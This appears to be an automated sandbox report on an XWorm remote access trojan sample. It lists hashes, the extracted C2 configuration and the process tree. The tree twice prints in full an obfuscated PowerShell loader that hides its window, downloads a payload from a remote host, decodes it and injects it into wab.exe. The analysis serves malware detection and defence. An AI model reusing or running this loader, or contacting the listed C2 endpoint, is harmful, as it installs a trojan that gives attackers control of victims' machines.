xworm | bde622fc1ddebc014f70ce6da713d999d723ec473bf5497a669fd8fbea287e94

General

Target

las.cmd
Size

6KB
MD5

3a4042eca22b5630f0d94807b7ebf1ab
SHA1

274dec7f1a11302050f24f06f19bc357eee9959e
SHA256

bde622fc1ddebc014f70ce6da713d999d723ec473bf5497a669fd8fbea287e94
SHA512

b7d0653e191f2c56acf22915cfd199ac79d94129d56926d8f99aaa5f834d08196a56998d586ab034b9bd44bc8e759e133da08d0ee853f3c54fee9336913df59c
SSDEEP

96:akLd2YhwXGsvb/IncRIVZjAcmwkpi9Jyg8XiD7528pekM6w2He3JzFBmWsc9nODy:aBYe/b/IcmZjKw5rT5FAx8evcWsc94y

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2016-88-0x0000000000360000-0x0000000000370000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 2268 powershell.exe
7 2268 powershell.exe
9 2268 powershell.exe
11 2268 powershell.exe
13 2268 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2268 powershell.exe
3028 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2016 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

3028 powershell.exe
2016 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3028 set thread context of 2016 3028 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2268 powershell.exe
3028 powershell.exe
3028 powershell.exe
2016 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

3028 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2268 powershell.exe
Token: SeDebugPrivilege 3028 powershell.exe
Token: SeDebugPrivilege 2016 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2016 wab.exe

flow	pid	process
5	2268	powershell.exe
7	2268	powershell.exe
9	2268	powershell.exe
11	2268	powershell.exe
13	2268	powershell.exe

pid	process
2268	powershell.exe
3028	powershell.exe

pid	process
2016	wab.exe

pid	process
3028	powershell.exe
2016	wab.exe

description	pid	process	target process
PID 3028 set thread context of 2016	3028	powershell.exe	wab.exe

pid	process
2268	powershell.exe
3028	powershell.exe
3028	powershell.exe
2016	wab.exe

pid	process
3028	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	2016	wab.exe

pid	process
2016	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2420 wrote to memory of 2268	2420	cmd.exe	powershell.exe
PID 2420 wrote to memory of 2268	2420	cmd.exe	powershell.exe
PID 2420 wrote to memory of 2268	2420	cmd.exe	powershell.exe
PID 2268 wrote to memory of 2644	2268	powershell.exe	cmd.exe
PID 2268 wrote to memory of 2644	2268	powershell.exe	cmd.exe
PID 2268 wrote to memory of 2644	2268	powershell.exe	cmd.exe
PID 2268 wrote to memory of 3028	2268	powershell.exe	powershell.exe
PID 2268 wrote to memory of 3028	2268	powershell.exe	powershell.exe
PID 2268 wrote to memory of 3028	2268	powershell.exe	powershell.exe
PID 2268 wrote to memory of 3028	2268	powershell.exe	powershell.exe
PID 3028 wrote to memory of 2792	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2792	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2792	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2792	3028	powershell.exe	cmd.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe
PID 3028 wrote to memory of 2016	3028	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\las.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Helvetica='Sub';$Helvetica+='strin';$Finn81 = 1;$Helvetica+='g';Function Enkeltvis($Fuldstndigheden){$Outgrin=$Fuldstndigheden.Length-$Finn81;For($Hegnstraad=5;$Hegnstraad -lt $Outgrin;$Hegnstraad+=6){$Merkonomernes+=$Fuldstndigheden.$Helvetica.Invoke( $Hegnstraad, $Finn81);}$Merkonomernes;}function Surfeiting($Retsinstituts){ .($Mindevrdig105) ($Retsinstituts);}$Unadduced=Enkeltvis ' .ateMbekrioMitzvzSelekiLnmodlKongel .assa,igar/Spher5 Inhe.Tigge0 ishe Tal,u(Sou hWN nsuiSu.stnresyndcatacoUptilwTarmks Dame Ind,aN FremTAvia, P ula1.enai0aliza.S aer0R,vio; blin AppeaWFor.uimil,snSty,o6Appul4Trimp;Len,m Proc.x inau6 Over4Nyans;Creod KinemrAnurivTreef: Rig.1Poeti2 Epiz1Woman.Scolo0 D ga) ,til B.rseG kilseRadiacTorvekVaernoFiske/Bldgr2Fe.lb0U,spo1 Brkr0,ateg0Oprrs1 Fler0Eno,a1 Klar De,iaFLophoiPlurarsneezeNedstfPolypoSeriex Domk/ nsul1 Afvn2Eamon1Bese..Homo,0coc,a ';$Naturtalent=Enkeltvis 'WilliU T,knsKje eeResenrOverd-Stat.A Sc ugSo omeUropanBaandtO ers ';$Blokbeskyttelsen=Enkeltvis 'F,annhBrepitElliptPrerepSupersAlien:Frabe/ ispe/Rili.wLam,awDucklwSwann.CoendsPantoe Fi,sn FlakdPalmes pacep,lodtaKernicDesceeZithe.Tvangc P.otoSpinemModes/Un elpgnotorTermooMaudl/ Umbed tasl.enpe/Water0Lingeu BladoArtisjka.itxUnjub0B.pre ';$Faggy=Enkeltvis ' enne>Brems ';$Mindevrdig105=Enkeltvis 'S.mafiAmmo,eInterxmefis ';$Imparsonee='Fugio';$stedsbiords = Enkeltvis 'AfridePla,tcDyndshSubsto nneu Op at%F rbrasyltepPlanop ForpdidoloaNektotNyligaLgdom%Fleur\VurdeCEshjboIsta,rDay odAperiifri,ea temu.TatovGUdvika S inrLmmel ro h&Defro&Limit Pre.eOmladcCreodhWi raoBandb FnokstMasse ';Surfeiting (Enkeltvis 'Foreg$GrippgRedellNigg o DesebPeroxa SniglNonde: ikriRlimmoeFun.mlXanthiUdk leWild vTittie Pones Indv2Yea,l2Noege4 Subm=repro(Fo.ebcCon,umbrutad ioxi Invad/IndhacIndre L.bsk$Ddel,sKoshetLabioeModstd AlpesNonrebFrdigiPlaneo Ovulr X,rad.amles Unfo) Tarm ');Surfeiting (Enkeltvis 'Count$Pegm,gdistrlFugt,oAnalob S.araAsseml Myo : AnalFFadseeThrashDishoa AcquaDyrefrCystoeSpirinMod.teStigmsSnobb=Stran$AvisuBKiltil ClicoAsocikPli tb Gaste.ommeslhegnkHearsyFluortRaag,t emie TanklVldigs leareF.edbnMonol.Kances erispbehvel .oreibutiktSolsp(d.cty$LangtFEmblaaPjaskgjob egB.twayknk,e),elvs ');$Blokbeskyttelsen=$Fehaarenes[0];$Racerbiler= (Enkeltvis ' Dys,$Kons g Nonelte,rao S,atbNoncoaLyretlTypef:AconuHA omaeDomingSlagin overs,ynantlivsarRaj,gaContaaKa,otdPoly eSpe.inAnpri=EstasNS receConstw Rott- Ut,tODas.ebAbekaj N deeEuryacFrafatFissi ,heraS NonvyUoplssQuay.tSlumse PepomMi jo.StatiN,arveeop.retDisso.,athoWUnd.ie S,gubIdmmeC indelOmstniGenuseAd.ctnCoalit');$Racerbiler+=$Relieves224[1];Surfeiting ($Racerbiler);Surfeiting (Enkeltvis ' Fdev$r sibHtriteePat.ogLa,drnSporosAdusttChronrAnnexaUnitaavandadMine eSkibsnOverh.AstraH Ultre PistaSvirrdBer ne tatr CarbsBeh,v[ .opi$NonprNMangeaCerebt PsycuDiscorOutbrtPrejuaTarmplKyphoePaadrnParr tCorre]Elmas=Reole$Di.fuURownen RostaEx redReba,dSkrmsuRemiscIntereBil.edSprng ');$Cartogrammes=Enkeltvis ' Drou$PlkkeHStatieSpurrgGrusvnDiplosButtettaagerDevotaStrenaPaperd.resseandennCross.UndivD monooImpliw.raekn.anonlInfaloMultia LegadSy crFFr,vriUnsellBambue Reac(Embed$DreadBSkolilChuppoA,bjnkSpannbMet,le RabasSnivekZ.druyBellat HooktinveceNoninlgaj gsUnderePre cnLease,Colle$ UndeFFuldas Ho.ntfors,nBejleeBaandsSdsup)Beski ';$Fstnes=$Relieves224[0];Surfeiting (Enkeltvis ' F.tn$Pr ntgBilanl latho C,asb.olstaChuntlTachy:CubanAErhveuLdrepkUnno,tAfskriCasemo.orman MonssT ansh MoraaKillilModst=Combu(KlageTFornjemakulsT.mmet Homi-Volu PFrdigaPr,bltEtre h Chec Stvn.$ThyreFNonrespr vitNippynHet reRig rsUnder)Toyfe ');while (!$Auktionshal) {Surfeiting (Enkeltvis ' Bere$OxyhegElverlAhrimoSkraabTilbaaGenarlKlein:SquidGChaffeVkstbnAd,nifs.ndroForsvrPeptitMonkslOkkerl korei a,mrnOddmeg E keeAntirn Unbrsnu,se=sjlev$salt,tIndl.r Nonpu ungdeR.akt ') ;Surfeiting $Cartogrammes;Surfeiting (Enkeltvis 'SjldeSRuefutSengeaGgesnrUnwortRock.- revSudfoelFerreeS,mmeeJulekpBizar .nti4Polit ');Surfeiting (Enkeltvis 'B,mbo$ ighpg.aiselB.ttoo Opskb Ch,raGalgelUnma.:Jade,AUngouuDengskKaim tR,alliP.nsio ulfanBrikesExp,ihTourna rklalAflgg=Hoard(Dr,ftT ObedeSmaassSkjo tUdste-PtomaP Exenaprivat.ostuhsubr, Casp.$ TaruFTrivssb waitExecun.ntiseHogwasB,gge)g lop ') ;Surfeiting (Enkeltvis 'Docks$SulkiglivfulStokvoC.rrob TangaF.senl Niev:v sumHFersiacarcilM thovEftertTur,eaMagesnDa.kogS bspeB rbenPosektNonameSonnerArchd=Heste$ProtegJ.nvilErnrioHesitbJems,a.avonl Nonp:roicgN Unlods uder D ageDjrven UfoedEks.reTuris+Ralli+Bu.ca%Stb.u$LavstF asbreNongrh s abaExempaNachtr,aricefixivn ,unseSnrklsEmpir.Cartec PhleoM rstuUrinanCl gwtGomph ') ;$Blokbeskyttelsen=$Fehaarenes[$Halvtangenter];}$Isopleura=307994;$Exciton=29049;Surfeiting (Enkeltvis 'capri$m gicgRoanplSlagtoUdstybEt,gra.illelUnsto:rekonHg ngseSpu vdBadevnudsttiAvlsfnRestlg Nau,eA.thrr ,hgrnFogedeHent. Fire=Tidsp P.eemG U,deeSt.tstKllin-Stjf.COutbao mparnUop.ytBest,eHemianmortitTi,la Stand$PorraFLoph.sf.rdyt,pecinTelefeBasilsFl dg ');Surfeiting (Enkeltvis 'Silan$Leg,mgSkovllTit,loHvinebJudaha HeadlBl.ds:,acheSA,sioaMennelRecoogAlg fb U dla.naugrSkovseUnwherB skeeLoofisCompr ykel= Gune Forh.[ U,veS.uadryDre.esUnpubtBiokee R,sem,akni.WrongC arbooTurbinGesjfvuncule andrManagtHypov]Konst:Codev: MammFSadder.ngago Def.m Pu,sBBarfoaEksprsPe.eteBe ha6Skurk4KuijpSCommutAyinpr RestiTransnGemligForud(Magaz$Tffe,HKni,kesnowsd DagtnCherripolyunabwabg enhaeAntr,rKafeenFlyveeSplin)lo de ');Surfeiting (Enkeltvis 'Clada$PreingMajlilHarrooApropbgjorda Ov,rlJ.sco: ThruBOprrsyAlpingMas egPrvekeUn rerEgepaeBlotcnMicrotAcan,eSupernGawke Acnid=Devon Aaste[unscaSUds,rySmarasYnkvrtprod eHie omarbej.EkspeT ShmeeUndewxF,ldetFies..CheniE SpednSterncRacegoHonord KlniiRationVerbogSuppl]Pla,s:Arter:misdiA InteS TenoCF,rsnIO ienINarro.Vati,GLandveIsa.etHabitSSneg,t Secrr Af ai Sen,nSideggEfter( Fors$RestiSCerataSocialOgeesgHyperbHvepsaSarrar.etere PostrHa.loeB,llisFaeca)Frugt ');Surfeiting (Enkeltvis 'Autop$s aragTimefl EsthoStvk.b,heomaMaddelInstr:KljesITork.nSiametSkispePylorrFif,eaSubtocEcd stRettniSupero SearnAngreiFi.trs Trfom Cali= Flad$ Bil.BMyselyStri.g Autog ZaraeAn,iar Va.deregnsn Ku rtAfsejeSp dsnBugta.Hungeso.ernuMargibPtelesCapstt Pa,prHoke i Afbon FormgR val(Fortr$proteInoninsL.terovice pSolidl MudreRjseruT.aner.accuaTerra,Keelh$Am laEFanatx Sme.cFritaiBry,gtsodeaoUdm,gnPre,r)d,por ');Surfeiting $Interactionism;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cordia.Gar && echo t"
3⤵
PID:2644

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Helvetica='Sub';$Helvetica+='strin';$Finn81 = 1;$Helvetica+='g';Function Enkeltvis($Fuldstndigheden){$Outgrin=$Fuldstndigheden.Length-$Finn81;For($Hegnstraad=5;$Hegnstraad -lt $Outgrin;$Hegnstraad+=6){$Merkonomernes+=$Fuldstndigheden.$Helvetica.Invoke( $Hegnstraad, $Finn81);}$Merkonomernes;}function Surfeiting($Retsinstituts){ .($Mindevrdig105) ($Retsinstituts);}$Unadduced=Enkeltvis ' .ateMbekrioMitzvzSelekiLnmodlKongel .assa,igar/Spher5 Inhe.Tigge0 ishe Tal,u(Sou hWN nsuiSu.stnresyndcatacoUptilwTarmks Dame Ind,aN FremTAvia, P ula1.enai0aliza.S aer0R,vio; blin AppeaWFor.uimil,snSty,o6Appul4Trimp;Len,m Proc.x inau6 Over4Nyans;Creod KinemrAnurivTreef: Rig.1Poeti2 Epiz1Woman.Scolo0 D ga) ,til B.rseG kilseRadiacTorvekVaernoFiske/Bldgr2Fe.lb0U,spo1 Brkr0,ateg0Oprrs1 Fler0Eno,a1 Klar De,iaFLophoiPlurarsneezeNedstfPolypoSeriex Domk/ nsul1 Afvn2Eamon1Bese..Homo,0coc,a ';$Naturtalent=Enkeltvis 'WilliU T,knsKje eeResenrOverd-Stat.A Sc ugSo omeUropanBaandtO ers ';$Blokbeskyttelsen=Enkeltvis 'F,annhBrepitElliptPrerepSupersAlien:Frabe/ ispe/Rili.wLam,awDucklwSwann.CoendsPantoe Fi,sn FlakdPalmes pacep,lodtaKernicDesceeZithe.Tvangc P.otoSpinemModes/Un elpgnotorTermooMaudl/ Umbed tasl.enpe/Water0Lingeu BladoArtisjka.itxUnjub0B.pre ';$Faggy=Enkeltvis ' enne>Brems ';$Mindevrdig105=Enkeltvis 'S.mafiAmmo,eInterxmefis ';$Imparsonee='Fugio';$stedsbiords = Enkeltvis 'AfridePla,tcDyndshSubsto nneu Op at%F rbrasyltepPlanop ForpdidoloaNektotNyligaLgdom%Fleur\VurdeCEshjboIsta,rDay odAperiifri,ea temu.TatovGUdvika S inrLmmel ro h&Defro&Limit Pre.eOmladcCreodhWi raoBandb FnokstMasse ';Surfeiting (Enkeltvis 'Foreg$GrippgRedellNigg o DesebPeroxa SniglNonde: ikriRlimmoeFun.mlXanthiUdk leWild vTittie Pones Indv2Yea,l2Noege4 Subm=repro(Fo.ebcCon,umbrutad ioxi Invad/IndhacIndre L.bsk$Ddel,sKoshetLabioeModstd AlpesNonrebFrdigiPlaneo Ovulr X,rad.amles Unfo) Tarm ');Surfeiting (Enkeltvis 'Count$Pegm,gdistrlFugt,oAnalob S.araAsseml Myo : AnalFFadseeThrashDishoa AcquaDyrefrCystoeSpirinMod.teStigmsSnobb=Stran$AvisuBKiltil ClicoAsocikPli tb Gaste.ommeslhegnkHearsyFluortRaag,t emie TanklVldigs leareF.edbnMonol.Kances erispbehvel .oreibutiktSolsp(d.cty$LangtFEmblaaPjaskgjob egB.twayknk,e),elvs ');$Blokbeskyttelsen=$Fehaarenes[0];$Racerbiler= (Enkeltvis ' Dys,$Kons g Nonelte,rao S,atbNoncoaLyretlTypef:AconuHA omaeDomingSlagin overs,ynantlivsarRaj,gaContaaKa,otdPoly eSpe.inAnpri=EstasNS receConstw Rott- Ut,tODas.ebAbekaj N deeEuryacFrafatFissi ,heraS NonvyUoplssQuay.tSlumse PepomMi jo.StatiN,arveeop.retDisso.,athoWUnd.ie S,gubIdmmeC indelOmstniGenuseAd.ctnCoalit');$Racerbiler+=$Relieves224[1];Surfeiting ($Racerbiler);Surfeiting (Enkeltvis ' Fdev$r sibHtriteePat.ogLa,drnSporosAdusttChronrAnnexaUnitaavandadMine eSkibsnOverh.AstraH Ultre PistaSvirrdBer ne tatr CarbsBeh,v[ .opi$NonprNMangeaCerebt PsycuDiscorOutbrtPrejuaTarmplKyphoePaadrnParr tCorre]Elmas=Reole$Di.fuURownen RostaEx redReba,dSkrmsuRemiscIntereBil.edSprng ');$Cartogrammes=Enkeltvis ' Drou$PlkkeHStatieSpurrgGrusvnDiplosButtettaagerDevotaStrenaPaperd.resseandennCross.UndivD monooImpliw.raekn.anonlInfaloMultia LegadSy crFFr,vriUnsellBambue Reac(Embed$DreadBSkolilChuppoA,bjnkSpannbMet,le RabasSnivekZ.druyBellat HooktinveceNoninlgaj gsUnderePre cnLease,Colle$ UndeFFuldas Ho.ntfors,nBejleeBaandsSdsup)Beski ';$Fstnes=$Relieves224[0];Surfeiting (Enkeltvis ' F.tn$Pr ntgBilanl latho C,asb.olstaChuntlTachy:CubanAErhveuLdrepkUnno,tAfskriCasemo.orman MonssT ansh MoraaKillilModst=Combu(KlageTFornjemakulsT.mmet Homi-Volu PFrdigaPr,bltEtre h Chec Stvn.$ThyreFNonrespr vitNippynHet reRig rsUnder)Toyfe ');while (!$Auktionshal) {Surfeiting (Enkeltvis ' Bere$OxyhegElverlAhrimoSkraabTilbaaGenarlKlein:SquidGChaffeVkstbnAd,nifs.ndroForsvrPeptitMonkslOkkerl korei a,mrnOddmeg E keeAntirn Unbrsnu,se=sjlev$salt,tIndl.r Nonpu ungdeR.akt ') ;Surfeiting $Cartogrammes;Surfeiting (Enkeltvis 'SjldeSRuefutSengeaGgesnrUnwortRock.- revSudfoelFerreeS,mmeeJulekpBizar .nti4Polit ');Surfeiting (Enkeltvis 'B,mbo$ ighpg.aiselB.ttoo Opskb Ch,raGalgelUnma.:Jade,AUngouuDengskKaim tR,alliP.nsio ulfanBrikesExp,ihTourna rklalAflgg=Hoard(Dr,ftT ObedeSmaassSkjo tUdste-PtomaP Exenaprivat.ostuhsubr, Casp.$ TaruFTrivssb waitExecun.ntiseHogwasB,gge)g lop ') ;Surfeiting (Enkeltvis 'Docks$SulkiglivfulStokvoC.rrob TangaF.senl Niev:v sumHFersiacarcilM thovEftertTur,eaMagesnDa.kogS bspeB rbenPosektNonameSonnerArchd=Heste$ProtegJ.nvilErnrioHesitbJems,a.avonl Nonp:roicgN Unlods uder D ageDjrven UfoedEks.reTuris+Ralli+Bu.ca%Stb.u$LavstF asbreNongrh s abaExempaNachtr,aricefixivn ,unseSnrklsEmpir.Cartec PhleoM rstuUrinanCl gwtGomph ') ;$Blokbeskyttelsen=$Fehaarenes[$Halvtangenter];}$Isopleura=307994;$Exciton=29049;Surfeiting (Enkeltvis 'capri$m gicgRoanplSlagtoUdstybEt,gra.illelUnsto:rekonHg ngseSpu vdBadevnudsttiAvlsfnRestlg Nau,eA.thrr ,hgrnFogedeHent. Fire=Tidsp P.eemG U,deeSt.tstKllin-Stjf.COutbao mparnUop.ytBest,eHemianmortitTi,la Stand$PorraFLoph.sf.rdyt,pecinTelefeBasilsFl dg ');Surfeiting (Enkeltvis 'Silan$Leg,mgSkovllTit,loHvinebJudaha HeadlBl.ds:,acheSA,sioaMennelRecoogAlg fb U dla.naugrSkovseUnwherB skeeLoofisCompr ykel= Gune Forh.[ U,veS.uadryDre.esUnpubtBiokee R,sem,akni.WrongC arbooTurbinGesjfvuncule andrManagtHypov]Konst:Codev: MammFSadder.ngago Def.m Pu,sBBarfoaEksprsPe.eteBe ha6Skurk4KuijpSCommutAyinpr RestiTransnGemligForud(Magaz$Tffe,HKni,kesnowsd DagtnCherripolyunabwabg enhaeAntr,rKafeenFlyveeSplin)lo de ');Surfeiting (Enkeltvis 'Clada$PreingMajlilHarrooApropbgjorda Ov,rlJ.sco: ThruBOprrsyAlpingMas egPrvekeUn rerEgepaeBlotcnMicrotAcan,eSupernGawke Acnid=Devon Aaste[unscaSUds,rySmarasYnkvrtprod eHie omarbej.EkspeT ShmeeUndewxF,ldetFies..CheniE SpednSterncRacegoHonord KlniiRationVerbogSuppl]Pla,s:Arter:misdiA InteS TenoCF,rsnIO ienINarro.Vati,GLandveIsa.etHabitSSneg,t Secrr Af ai Sen,nSideggEfter( Fors$RestiSCerataSocialOgeesgHyperbHvepsaSarrar.etere PostrHa.loeB,llisFaeca)Frugt ');Surfeiting (Enkeltvis 'Autop$s aragTimefl EsthoStvk.b,heomaMaddelInstr:KljesITork.nSiametSkispePylorrFif,eaSubtocEcd stRettniSupero SearnAngreiFi.trs Trfom Cali= Flad$ Bil.BMyselyStri.g Autog ZaraeAn,iar Va.deregnsn Ku rtAfsejeSp dsnBugta.Hungeso.ernuMargibPtelesCapstt Pa,prHoke i Afbon FormgR val(Fortr$proteInoninsL.terovice pSolidl MudreRjseruT.aner.accuaTerra,Keelh$Am laEFanatx Sme.cFritaiBry,gtsodeaoUdm,gnPre,r)d,por ');Surfeiting $Interactionism;"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cordia.Gar && echo t"
4⤵
PID:2792

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2016

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
34a459850c87e414b35ac7fb5b50e7a8

SHA1
333511ef92ed3761420a63e45a9148645821ea3f

SHA256
b8b6b6e4ca803c833c9b83b8067f3ce1ecc63a01c4a265958740c30c4c701927

SHA512
ce66aa075315fce9ca671cdcd4f97adb752bfee8d6e6df9150c49b4c4176afbeac407cc990cfa7497d843a36dbe61a99cd2d62cc0e6cd83c70ba2f6596cb2a69

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab25FA.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar25FD.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Cordia.Gar
Filesize
438KB

MD5
599de422e4b7b2e55ee51979601235be

SHA1
c2719ff203841bcd9486306aac1900ba6278ddf4

SHA256
19f979866becbdd29931391e67205505aedb85ad3604fd086d2b048b64ef8c23

SHA512
ad94dfea0fc63cc947a11cce4ca7e337090de8f537afacd9c9ea4f9075da2b9562fd8fae3d684d4f7eaf4ead74e6327f8a17fff7f490d5cdb973bfcfecc4d127

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KP6FK3VCNTMTFW61O2V8.temp
Filesize
7KB

MD5
cc802ee4f70315901132e8a7fc2cff0f

SHA1
73f53273cf81c4ee0ab27fef013db533cab39130

SHA256
e32202bba8d9903562042045069b5485d65f9456c0644306df037e10beac34a8

SHA512
d9da7b232c9a4379542eba3e00b0021a46a7fbb6dde07771188e9dc48f34cf46153cf79a0c3704418e3819d251b07e94f2a13fc308d83a961ed8322949fd3f60

Download Submit
memory/2016-75-0x0000000000360000-0x00000000013C2000-memory.dmp

Filesize
16.4MB

Download
memory/2016-88-0x0000000000360000-0x0000000000370000-memory.dmp

Filesize
64KB

Download
memory/2016-86-0x0000000000360000-0x00000000013C2000-memory.dmp

Filesize
16.4MB

Download
memory/2268-6-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download
memory/2268-7-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-4-0x000007FEF648E000-0x000007FEF648F000-memory.dmp

Filesize
4KB

Download
memory/2268-9-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-55-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-57-0x000007FEF648E000-0x000007FEF648F000-memory.dmp

Filesize
4KB

Download
memory/2268-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2268-8-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-11-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-87-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-10-0x000007FEF61D0000-0x000007FEF6B6D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-56-0x00000000064C0000-0x0000000007799000-memory.dmp

Filesize
18.8MB

Download

Analysis

Sharing